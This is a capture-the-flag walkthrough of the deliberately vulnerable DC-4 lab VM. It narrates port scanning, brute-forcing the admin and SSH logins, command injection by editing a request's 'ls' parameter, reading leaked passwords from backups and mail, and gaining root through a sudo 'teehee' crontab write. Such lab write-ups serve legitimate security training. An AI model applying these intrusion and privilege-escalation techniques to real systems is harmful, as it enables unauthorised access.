DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
DC-4 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs. If there are any issues running this VM in VMware, have a read through of this. It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go. While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause. In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Machine is available at the following domain:
We start our hunting with namp scanning
After port scanning we found two open port, port 22 and 80. In order to find the hidden directories we are going for the directory scanning with gobuster.
We didn’t got much information from the scanning so we just open the website.
We got admin login page so we guessed that username could be admin as default and by using burp suit we just created payload and brute-force to get password and we got password as happy . So we login using these credentials.
When we click on the command link we were forwarded to another page which contains 3 options. Each time when we click those we are redirected to some other page with some list of files and information about disk space.
When we check these request through burp suit we find that ls -l command is written as ls+-l
So we try to change the command to be executed through burp suit and try to find any useful information
When we try ls+/home we found three directories named jim,charles,sam. Next we execute ls+/home/jim to find any useful files and we were lucky we got a file named backups
When we go through backups file we found a folder named old-passwords-bak. The file contains a list of passwords.
So we copy all those passwords and by using hydra we brute-force to get the password for user jim
Since we got username and password, we are going for ssh connection .When list jim’s directory we found a file named mbox. When we cat the file we got a message that jim had received a mail.
So we open /var/mail to found a the email that jim received. We come to know that the mail was from Charles along with his password.
Now we switch the user to Charles and run sudo -l and we found teehee is running
So we just exploit the teehee with crontabs to get the root permissions and found the rootflag
Pwned.!!!
Comments